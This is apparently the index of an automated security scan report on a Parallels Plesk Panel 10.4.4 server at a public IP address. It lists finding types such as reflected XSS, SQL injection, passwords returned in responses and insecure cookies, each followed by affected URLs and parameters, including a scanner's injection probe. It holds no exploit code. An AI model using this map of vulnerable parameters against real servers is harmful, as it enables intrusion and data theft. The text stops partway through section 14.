CVE-2011-4776, CVE-2011-4777, XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, Parallels Plesk Panel v10.4.4_build20111103.18 os_Windows 2003/2008

1. SQL injection

2. Cross-site scripting (reflected)

2.1. https://50.22.21.242:8443/ [start_page parameter]

2.2. https://50.22.21.242:8443/admin/update/settings/ [branch parameter]

2.3. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/ [cmd parameter]

2.4. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/create-dir/ [cmd parameter]

2.5. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/edit/ [cmd parameter]

2.6. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/edit/ [cmd parameter]

2.7. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/edit/ [file parameter]

2.8. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/edit/ [file parameter]

2.9. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/permissions/ [fname parameter]

2.10. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/rename/ [cmd parameter]

2.11. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/rename/ [file parameter]

2.12. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/rename/ [file parameter]

2.13. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/view/ [cmd parameter]

2.14. https://50.22.21.242:8443/relay [RefererHost parameter]

2.15. https://50.22.21.242:8443/relay [RefererPort parameter]

2.16. https://50.22.21.242:8443/relay [RefererPort parameter]

2.17. https://50.22.21.242:8443/relay [RefererScheme parameter]

2.18. https://50.22.21.242:8443/relay [RelayState parameter]

2.19. https://50.22.21.242:8443/relay [response_url parameter]

2.20. https://50.22.21.242:8443/smb/app/applications-list-data/catalogId/apscatalog [category parameter]

2.21. https://50.22.21.242:8443/smb/email-address/create [autoResponder%5BautoResponderSection%5D%5BcontentType%5D parameter]

2.22. https://50.22.21.242:8443/smb/my-profile [general%5Bvcard%5D%5Bemail%5D%5BemailType%5D parameter]

2.23. https://50.22.21.242:8447/preferences.html [login parameter]

3. Password returned in later response

3.1. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x0d31da90f06b3190532f4e59e9d4fa50/download/

3.2. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x0d31da90f06b3190532f4e59e9d4fa50/download/

3.3. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x0d5fe1e0c71b310ff48e5058690659c7/download/

3.4. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x0d5fe1e0c71b310ff48e5058690659c7/download/

3.5. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x3b7039b1d601c4e860c5949ac7508565/download/

3.6. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x3b7039b1d601c4e860c5949ac7508565/download/

3.7. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x4494a755f7bbdd67a5704fe2ea9e91cf/download/

3.8. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x4494a755f7bbdd67a5704fe2ea9e91cf/download/

3.9. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5079bf55ccf6521fb70ce0d4d76cdd2d/download/

3.10. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5079bf55ccf6521fb70ce0d4d76cdd2d/download/

3.11. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5627defbbf221e4d0b3fa7fa008c2a83/download/

3.12. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5627defbbf221e4d0b3fa7fa008c2a83/download/

3.13. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5a764c4aa919d45916a21adb9cd4bc2a/download/

3.14. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5a764c4aa919d45916a21adb9cd4bc2a/download/

3.15. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x84f3b2f887bd00dae55702ae30c9ac7c/download/

3.16. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x84f3b2f887bd00dae55702ae30c9ac7c/download/

3.17. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x926b8ec323bf6361f0a0a01ecfc62f15/download/

3.18. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x926b8ec323bf6361f0a0a01ecfc62f15/download/

4. SSL cookie without secure flag set

4.1. https://50.22.21.242:8443/

4.2. https://50.22.21.242:8443/admin/

4.3. https://50.22.21.242:8443/help.php

4.4. https://50.22.21.242:8443/login_up.php3

4.5. https://50.22.21.242:8443/smb/admin-home/installed-applications/

4.6. https://50.22.21.242:8447/

4.7. https://50.22.21.242:8447/add_components.html

4.8. https://50.22.21.242:8447/preferences.html

4.9. https://50.22.21.242:8447/select_components.html

4.10. https://50.22.21.242:8447/summary.html

4.11. https://50.22.21.242:8447/update_components.html

4.12. https://50.22.21.242:8443/admin/app/

4.13. https://50.22.21.242:8443/admin/app/usage

4.14. https://50.22.21.242:8443/admin/customer-service-plan/list/reset-search/true/

4.15. https://50.22.21.242:8443/admin/customer/create

4.16. https://50.22.21.242:8443/admin/customer/list

4.17. https://50.22.21.242:8443/admin/customer/overview/

4.18. https://50.22.21.242:8443/admin/customer/overview/id/

4.19. https://50.22.21.242:8443/admin/customer/overview/id/3

4.20. https://50.22.21.242:8443/admin/domain/list

4.21. https://50.22.21.242:8443/admin/health/chart-image/

4.22. https://50.22.21.242:8443/admin/health/index

4.23. https://50.22.21.242:8443/admin/health/parameters

4.24. https://50.22.21.242:8443/admin/home

4.25. https://50.22.21.242:8443/admin/home/

4.26. https://50.22.21.242:8443/admin/home/admin

4.27. https://50.22.21.242:8443/admin/home/click-promo/

4.28. https://50.22.21.242:8443/admin/home/click-promo/id/

4.29. https://50.22.21.242:8443/admin/home/click-promo/id/promo_click_mobile

4.30. https://50.22.21.242:8443/admin/index.php/

4.31. https://50.22.21.242:8443/admin/index.php/home

4.32. https://50.22.21.242:8443/admin/index.php/reseller/

4.33. https://50.22.21.242:8443/admin/index.php/reseller/login-info/

4.34. https://50.22.21.242:8443/admin/index.php/reseller/personal-info/

4.35. https://50.22.21.242:8443/admin/index.php/reseller/tools/

4.36. https://50.22.21.242:8443/admin/index.php/reseller/tools/id/

4.37. https://50.22.21.242:8443/admin/index.php/reseller/tools/id/1/

4.38. https://50.22.21.242:8443/admin/index.php/subscription/

4.39. https://50.22.21.242:8443/admin/index.php/subscription/list

4.40. https://50.22.21.242:8443/admin/promotion/

4.41. https://50.22.21.242:8443/admin/promotion/mobile-monitor/

4.42. https://50.22.21.242:8443/admin/reseller/create

4.43. https://50.22.21.242:8443/admin/reseller/list

4.44. https://50.22.21.242:8443/admin/reseller/list/

4.45. https://50.22.21.242:8443/admin/reseller/list/reset-search/true/

4.46. https://50.22.21.242:8443/admin/reseller/login-info/

4.47. https://50.22.21.242:8443/admin/reseller/personal-info/

4.48. https://50.22.21.242:8443/admin/reseller/tools/

4.49. https://50.22.21.242:8443/admin/reseller/tools/id/

4.50. https://50.22.21.242:8443/admin/reseller/tools/id/1/

4.51. https://50.22.21.242:8443/admin/server/admin-plan

4.52. https://50.22.21.242:8443/admin/server/tools

4.53. https://50.22.21.242:8443/admin/subscription/

4.54. https://50.22.21.242:8443/admin/subscription/create

4.55. https://50.22.21.242:8443/admin/subscription/list

4.56. https://50.22.21.242:8443/admin/subscription/list/reset-search/true/

4.57. https://50.22.21.242:8443/admin/subscription/login/id/1/

4.58. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/

4.59. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/app/

4.60. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/app/available/

4.61. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/app/available/id/

4.62. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/app/available/id/apscatalog

4.63. https://50.22.21.242:8443/admin/update/

4.64. https://50.22.21.242:8443/admin/update/settings

4.65. https://50.22.21.242:8443/admin/update/settings/

4.66. https://50.22.21.242:8443/admin/update/settings/e647e%22a%3d%22b%22c3c736922d6

4.67. https://50.22.21.242:8443/admin/update/settings/e647e%22a%3d%22b%22c3c736922d649560ed53f10167ff175bf77

4.68. https://50.22.21.242:8443/admin/webmail/

4.69. https://50.22.21.242:8443/admin/webmail/enable

4.70. https://50.22.21.242:8443/filemanager/getimg.php

4.71. https://50.22.21.242:8443/get_password.php

4.72. https://50.22.21.242:8443/help.php

4.73. https://50.22.21.242:8443/left.php3

4.74. https://50.22.21.242:8443/login_up.php3

4.75. https://50.22.21.242:8443/logout.php3

4.76. https://50.22.21.242:8443/plesk/actionlog/

4.77. https://50.22.21.242:8443/plesk/admin-alias@/

4.78. https://50.22.21.242:8443/plesk/admin-info/

4.79. https://50.22.21.242:8443/plesk/admin-password/

4.80. https://50.22.21.242:8443/plesk/admin/

4.81. https://50.22.21.242:8443/plesk/admin/report/

4.82. https://50.22.21.242:8443/plesk/admin/report/traffic-history/

4.83. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/create/

4.84. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/ftp-repository/

4.85. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/ftp-repository/properties/

4.86. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/

4.87. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x0d31da90f06b3190532f4e59e9d4fa50/restore/

4.88. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x0d5fe1e0c71b310ff48e5058690659c7/restore/

4.89. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x3b7039b1d601c4e860c5949ac7508565/restore/

4.90. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x4494a755f7bbdd67a5704fe2ea9e91cf/restore/

4.91. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5079bf55ccf6521fb70ce0d4d76cdd2d/restore/

4.92. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5627defbbf221e4d0b3fa7fa008c2a83/restore/

4.93. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5a764c4aa919d45916a21adb9cd4bc2a/restore/

4.94. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x84f3b2f887bd00dae55702ae30c9ac7c/restore/

4.95. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x926b8ec323bf6361f0a0a01ecfc62f15/restore/

4.96. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/upload/

4.97. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/schedule/

4.98. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/task@/

4.99. https://50.22.21.242:8443/plesk/client@1/domain@1/dns/

4.100. https://50.22.21.242:8443/plesk/client@1/domain@1/traffic-hosting

4.101. https://50.22.21.242:8443/plesk/client@1/shared-ssl/

4.102. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/

4.103. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/

4.104. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/create-dir/

4.105. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/edit/

4.106. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/permissions/

4.107. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/rename/

4.108. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/view/

4.109. https://50.22.21.242:8443/plesk/cp-access/

4.110. https://50.22.21.242:8443/plesk/custom-buttons/

4.111. https://50.22.21.242:8443/plesk/ftp-sessions/

4.112. https://50.22.21.242:8443/plesk/logo/

4.113. https://50.22.21.242:8443/plesk/notification@/

4.114. https://50.22.21.242:8443/plesk/server/components/

4.115. https://50.22.21.242:8443/plesk/server/google-tools/

4.116. https://50.22.21.242:8443/plesk/server/interface/locale@/

4.117. https://50.22.21.242:8443/plesk/server/interface/locale@multi/disable/

4.118. https://50.22.21.242:8443/plesk/server/interface/templates/

4.119. https://50.22.21.242:8443/plesk/server/interface/uimodes@/

4.120. https://50.22.21.242:8443/plesk/server/mail/

4.121. https://50.22.21.242:8443/plesk/server/preferences/

4.122. https://50.22.21.242:8443/plesk/server/services/

4.123. https://50.22.21.242:8443/plesk/server/statistics/

4.124. https://50.22.21.242:8443/plesk/server/tsclient/

4.125. https://50.22.21.242:8443/plesk/sessions/

4.126. https://50.22.21.242:8443/plesk/sessions/properties/

4.127. https://50.22.21.242:8443/plesk/ts-sessions/

4.128. https://50.22.21.242:8443/server/cp_access_add_edit.php

4.129. https://50.22.21.242:8443/server/firewall.php

4.130. https://50.22.21.242:8443/server/firewall_icmp.php

4.131. https://50.22.21.242:8443/server/firewall_interface.php

4.132. https://50.22.21.242:8443/server/firewall_rule_edit.php

4.133. https://50.22.21.242:8443/sessions/tssessions_info.php

4.134. https://50.22.21.242:8443/smb/app/available/

4.135. https://50.22.21.242:8443/smb/app/market/

4.136. https://50.22.21.242:8443/smb/app/market/id/

4.137. https://50.22.21.242:8443/smb/app/market/id/marketplace

4.138. https://50.22.21.242:8443/smb/database/create-user/databaseId/1

4.139. https://50.22.21.242:8443/smb/service/delete/

4.140. https://50.22.21.242:8443/smb/web/settings/id/1

4.141. https://50.22.21.242:8443/spaw/spaw.php

4.142. https://50.22.21.242:8443/sso/api.php

5. Cookie without HttpOnly flag set

5.1. https://50.22.21.242:8443/

5.2. https://50.22.21.242:8443/admin/

5.3. https://50.22.21.242:8443/help.php

5.4. https://50.22.21.242:8443/login_up.php3

5.5. https://50.22.21.242:8443/smb/admin-home/installed-applications/

5.6. https://50.22.21.242:8447/

5.7. https://50.22.21.242:8447/add_components.html

5.8. https://50.22.21.242:8447/preferences.html

5.9. https://50.22.21.242:8447/select_components.html

5.10. https://50.22.21.242:8447/summary.html

5.11. https://50.22.21.242:8447/update_components.html

5.12. https://50.22.21.242:8443/admin/app/

5.13. https://50.22.21.242:8443/admin/app/usage

5.14. https://50.22.21.242:8443/admin/customer-service-plan/list/reset-search/true/

5.15. https://50.22.21.242:8443/admin/customer/create

5.16. https://50.22.21.242:8443/admin/customer/list

5.17. https://50.22.21.242:8443/admin/customer/overview/

5.18. https://50.22.21.242:8443/admin/customer/overview/id/

5.19. https://50.22.21.242:8443/admin/customer/overview/id/3

5.20. https://50.22.21.242:8443/admin/domain/list

5.21. https://50.22.21.242:8443/admin/health/chart-image/

5.22. https://50.22.21.242:8443/admin/health/index

5.23. https://50.22.21.242:8443/admin/health/parameters

5.24. https://50.22.21.242:8443/admin/home

5.25. https://50.22.21.242:8443/admin/home/

5.26. https://50.22.21.242:8443/admin/home/admin

5.27. https://50.22.21.242:8443/admin/home/click-promo/

5.28. https://50.22.21.242:8443/admin/home/click-promo/id/

5.29. https://50.22.21.242:8443/admin/home/click-promo/id/promo_click_mobile

5.30. https://50.22.21.242:8443/admin/index.php/

5.31. https://50.22.21.242:8443/admin/index.php/home

5.32. https://50.22.21.242:8443/admin/index.php/reseller/

5.33. https://50.22.21.242:8443/admin/index.php/reseller/login-info/

5.34. https://50.22.21.242:8443/admin/index.php/reseller/personal-info/

5.35. https://50.22.21.242:8443/admin/index.php/reseller/tools/

5.36. https://50.22.21.242:8443/admin/index.php/reseller/tools/id/

5.37. https://50.22.21.242:8443/admin/index.php/reseller/tools/id/1/

5.38. https://50.22.21.242:8443/admin/index.php/subscription/

5.39. https://50.22.21.242:8443/admin/index.php/subscription/list

5.40. https://50.22.21.242:8443/admin/promotion/

5.41. https://50.22.21.242:8443/admin/promotion/mobile-monitor/

5.42. https://50.22.21.242:8443/admin/reseller/create

5.43. https://50.22.21.242:8443/admin/reseller/list

5.44. https://50.22.21.242:8443/admin/reseller/list/

5.45. https://50.22.21.242:8443/admin/reseller/list/reset-search/true/

5.46. https://50.22.21.242:8443/admin/reseller/login-info/

5.47. https://50.22.21.242:8443/admin/reseller/personal-info/

5.48. https://50.22.21.242:8443/admin/reseller/tools/

5.49. https://50.22.21.242:8443/admin/reseller/tools/id/

5.50. https://50.22.21.242:8443/admin/reseller/tools/id/1/

5.51. https://50.22.21.242:8443/admin/server/admin-plan

5.52. https://50.22.21.242:8443/admin/server/tools

5.53. https://50.22.21.242:8443/admin/subscription/

5.54. https://50.22.21.242:8443/admin/subscription/create

5.55. https://50.22.21.242:8443/admin/subscription/list

5.56. https://50.22.21.242:8443/admin/subscription/list/reset-search/true/

5.57. https://50.22.21.242:8443/admin/subscription/login/id/1/

5.58. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/

5.59. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/app/

5.60. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/app/available/

5.61. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/app/available/id/

5.62. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/app/available/id/apscatalog

5.63. https://50.22.21.242:8443/admin/update/

5.64. https://50.22.21.242:8443/admin/update/settings

5.65. https://50.22.21.242:8443/admin/update/settings/

5.66. https://50.22.21.242:8443/admin/update/settings/e647e%22a%3d%22b%22c3c736922d6

5.67. https://50.22.21.242:8443/admin/update/settings/e647e%22a%3d%22b%22c3c736922d649560ed53f10167ff175bf77

5.68. https://50.22.21.242:8443/admin/webmail/

5.69. https://50.22.21.242:8443/admin/webmail/enable

5.70. https://50.22.21.242:8443/filemanager/getimg.php

5.71. https://50.22.21.242:8443/get_password.php

5.72. https://50.22.21.242:8443/help.php

5.73. https://50.22.21.242:8443/left.php3

5.74. https://50.22.21.242:8443/login_up.php3

5.75. https://50.22.21.242:8443/logout.php3

5.76. https://50.22.21.242:8443/plesk/actionlog/

5.77. https://50.22.21.242:8443/plesk/admin-alias@/

5.78. https://50.22.21.242:8443/plesk/admin-info/

5.79. https://50.22.21.242:8443/plesk/admin-password/

5.80. https://50.22.21.242:8443/plesk/admin/

5.81. https://50.22.21.242:8443/plesk/admin/report/

5.82. https://50.22.21.242:8443/plesk/admin/report/traffic-history/

5.83. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/create/

5.84. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/ftp-repository/

5.85. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/ftp-repository/properties/

5.86. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/

5.87. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x0d31da90f06b3190532f4e59e9d4fa50/restore/

5.88. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x0d5fe1e0c71b310ff48e5058690659c7/restore/

5.89. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x3b7039b1d601c4e860c5949ac7508565/restore/

5.90. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x4494a755f7bbdd67a5704fe2ea9e91cf/restore/

5.91. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5079bf55ccf6521fb70ce0d4d76cdd2d/restore/

5.92. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5627defbbf221e4d0b3fa7fa008c2a83/restore/

5.93. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5a764c4aa919d45916a21adb9cd4bc2a/restore/

5.94. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x84f3b2f887bd00dae55702ae30c9ac7c/restore/

5.95. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x926b8ec323bf6361f0a0a01ecfc62f15/restore/

5.96. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/upload/

5.97. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/schedule/

5.98. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/task@/

5.99. https://50.22.21.242:8443/plesk/client@1/domain@1/dns/

5.100. https://50.22.21.242:8443/plesk/client@1/domain@1/traffic-hosting

5.101. https://50.22.21.242:8443/plesk/client@1/shared-ssl/

5.102. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/

5.103. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/

5.104. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/create-dir/

5.105. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/edit/

5.106. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/permissions/

5.107. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/rename/

5.108. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/view/

5.109. https://50.22.21.242:8443/plesk/cp-access/

5.110. https://50.22.21.242:8443/plesk/custom-buttons/

5.111. https://50.22.21.242:8443/plesk/ftp-sessions/

5.112. https://50.22.21.242:8443/plesk/logo/

5.113. https://50.22.21.242:8443/plesk/notification@/

5.114. https://50.22.21.242:8443/plesk/server/components/

5.115. https://50.22.21.242:8443/plesk/server/google-tools/

5.116. https://50.22.21.242:8443/plesk/server/interface/locale@/

5.117. https://50.22.21.242:8443/plesk/server/interface/locale@multi/disable/

5.118. https://50.22.21.242:8443/plesk/server/interface/templates/

5.119. https://50.22.21.242:8443/plesk/server/interface/uimodes@/

5.120. https://50.22.21.242:8443/plesk/server/mail/

5.121. https://50.22.21.242:8443/plesk/server/preferences/

5.122. https://50.22.21.242:8443/plesk/server/services/

5.123. https://50.22.21.242:8443/plesk/server/statistics/

5.124. https://50.22.21.242:8443/plesk/server/tsclient/

5.125. https://50.22.21.242:8443/plesk/sessions/

5.126. https://50.22.21.242:8443/plesk/sessions/properties/

5.127. https://50.22.21.242:8443/plesk/ts-sessions/

5.128. https://50.22.21.242:8443/server/cp_access_add_edit.php

5.129. https://50.22.21.242:8443/server/firewall.php

5.130. https://50.22.21.242:8443/server/firewall_icmp.php

5.131. https://50.22.21.242:8443/server/firewall_interface.php

5.132. https://50.22.21.242:8443/server/firewall_rule_edit.php

5.133. https://50.22.21.242:8443/sessions/tssessions_info.php

5.134. https://50.22.21.242:8443/smb/app/available/

5.135. https://50.22.21.242:8443/smb/app/market/

5.136. https://50.22.21.242:8443/smb/app/market/id/

5.137. https://50.22.21.242:8443/smb/app/market/id/marketplace

5.138. https://50.22.21.242:8443/smb/database/create-user/databaseId/1

5.139. https://50.22.21.242:8443/smb/service/delete/

5.140. https://50.22.21.242:8443/smb/web/settings/id/1

5.141. https://50.22.21.242:8443/spaw/spaw.php

5.142. https://50.22.21.242:8443/sso/api.php

6. Password field with autocomplete enabled

6.1. https://50.22.21.242:8443/plesk/admin-password/

6.2. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/ftp-repository/properties/

6.3. https://50.22.21.242:8443/plesk/server/google-tools/

6.4. https://50.22.21.242:8443/smb/my-profile

6.5. https://50.22.21.242:8443/smb/user/create

6.6. https://50.22.21.242:8447/

6.7. https://50.22.21.242:8447/add_components.html

6.8. https://50.22.21.242:8447/add_components.html

6.9. https://50.22.21.242:8447/add_components.html

6.10. https://50.22.21.242:8447/preferences.html

6.11. https://50.22.21.242:8447/select_components.html

6.12. https://50.22.21.242:8447/summary.html

6.13. https://50.22.21.242:8447/update_components.html

6.14. https://50.22.21.242:8447/update_components.html

6.15. https://50.22.21.242:8447/update_components.html

7. Cross-domain POST

8. Cross-domain Referer leakage

8.1. https://50.22.21.242:8443/enterprise/mobile-monitor/

8.2. https://50.22.21.242:8443/smb/app/search-data/catalogId/marketplace

9. File upload functionality

9.1. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/upload/

9.2. https://50.22.21.242:8443/plesk/logo/

9.3. https://50.22.21.242:8443/plesk/server/google-tools/

10. Email addresses disclosed

10.1. https://50.22.21.242:8443/admin/customer/overview/id/3

10.2. https://50.22.21.242:8443/plesk/admin-info/

10.3. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x0d31da90f06b3190532f4e59e9d4fa50/download/

10.4. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x0d5fe1e0c71b310ff48e5058690659c7/download/

10.5. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x3b7039b1d601c4e860c5949ac7508565/download/

10.6. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x4494a755f7bbdd67a5704fe2ea9e91cf/download/

10.7. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5079bf55ccf6521fb70ce0d4d76cdd2d/download/

10.8. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5627defbbf221e4d0b3fa7fa008c2a83/download/

10.9. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5a764c4aa919d45916a21adb9cd4bc2a/download/

10.10. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x84f3b2f887bd00dae55702ae30c9ac7c/download/

10.11. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x926b8ec323bf6361f0a0a01ecfc62f15/download/

10.12. https://50.22.21.242:8443/smb/email-address/edit/id/3

10.13. https://50.22.21.242:8443/smb/email-address/list

10.14. https://50.22.21.242:8443/smb/email-address/list/

10.15. https://50.22.21.242:8443/smb/user/list

10.16. https://50.22.21.242:8443/smb/user/list-data/

10.17. https://50.22.21.242:8443/smb/user/list-data/items-per-page/

10.18. https://50.22.21.242:8443/smb/user/list-data/items-per-page/100000

10.19. https://50.22.21.242:8443/smb/web/settings/id/1

10.20. https://50.22.21.242:8443/smb/web/view

11. Private IP addresses disclosed

11.1. https://50.22.21.242:8443/admin/subscription/create

11.2. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x0d31da90f06b3190532f4e59e9d4fa50/download/

11.3. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x0d5fe1e0c71b310ff48e5058690659c7/download/

11.4. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x3b7039b1d601c4e860c5949ac7508565/download/

11.5. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x4494a755f7bbdd67a5704fe2ea9e91cf/download/

11.6. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5079bf55ccf6521fb70ce0d4d76cdd2d/download/

11.7. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5627defbbf221e4d0b3fa7fa008c2a83/download/

11.8. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5a764c4aa919d45916a21adb9cd4bc2a/download/

11.9. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x84f3b2f887bd00dae55702ae30c9ac7c/download/

11.10. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x926b8ec323bf6361f0a0a01ecfc62f15/download/

11.11. https://50.22.21.242:8443/smb/admin-home

12. Cacheable HTTPS response

12.1. https://50.22.21.242:8443/admin/subscription/login/id/1/pageUrl/app/available/id/apscatalog

12.2. https://50.22.21.242:8443/images/logos/%7BlogoImg-a94ec100-1300-11e1-9daa-06e027a9e9a8%7D

12.3. https://50.22.21.242:8443/images/logos/{logoImg-76d156c0-1300-11e1-9daa-06e027a9e9a8}

12.4. https://50.22.21.242:8443/images/logos/{logoImg-8f2de940-1300-11e1-9daa-06e027a9e9a8}

12.5. https://50.22.21.242:8443/images/logos/{logoImg-a94ec100-1300-11e1-9daa-06e027a9e9a8}

12.6. https://50.22.21.242:8443/javascript/chk.js.php

12.7. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/view/

12.8. https://50.22.21.242:8443/relay

12.9. https://50.22.21.242:8443/spaw/spaw.php

12.10. https://50.22.21.242:8447/

12.11. https://50.22.21.242:8447/add_components.html

12.12. https://50.22.21.242:8447/get_enabled_product_icon

12.13. https://50.22.21.242:8447/preferences.html

12.14. https://50.22.21.242:8447/select_components.html

12.15. https://50.22.21.242:8447/summary.html

12.16. https://50.22.21.242:8447/update_components.html

13. Multiple content types specified

14. HTML does not specify charset

14.1. https://50.22.21.242:8443/

14.2. https://50.22.21.242:8443/admin/

14.3. https://50.22.21.242:8443/admin/app/

14.4. https://50.22.21.242:8443/admin/app/usage

14.5. https://50.22.21.242:8443/admin/customer-service-plan/

14.6. https://50.22.21.242:8443/admin/customer-service-plan/list

14.7. https://50.22.21.242:8443/admin/customer-service-plan/list/reset-search/true/

14.8. https://50.22.21.242:8443/admin/customer/

14.9. https://50.22.21.242:8443/admin/customer/create

14.10. https://50.22.21.242:8443/admin/customer/list

14.11. https://50.22.21.242:8443/admin/customer/overview/

14.12. https://50.22.21.242:8443/admin/customer/overview/id/

14.13. https://50.22.21.242:8443/admin/customer/overview/id/3

14.14. https://50.22.21.242:8443/admin/domain/

14.15. https://50.22.21.242:8443/admin/domain/list

14.16. https://50.22.21.242:8443/admin/health/

14.17. https://50.22.21.242:8443/admin/health/chart-image/

14.18. https://50.22.21.242:8443/admin/health/index

14.19. https://50.22.21.242:8443/admin/health/parameters

14.20. https://50.22.21.242:8443/admin/home

14.21. https://50.22.21.242:8443/admin/home/

14.22. https://50.22.21.242:8443/admin/home/admin

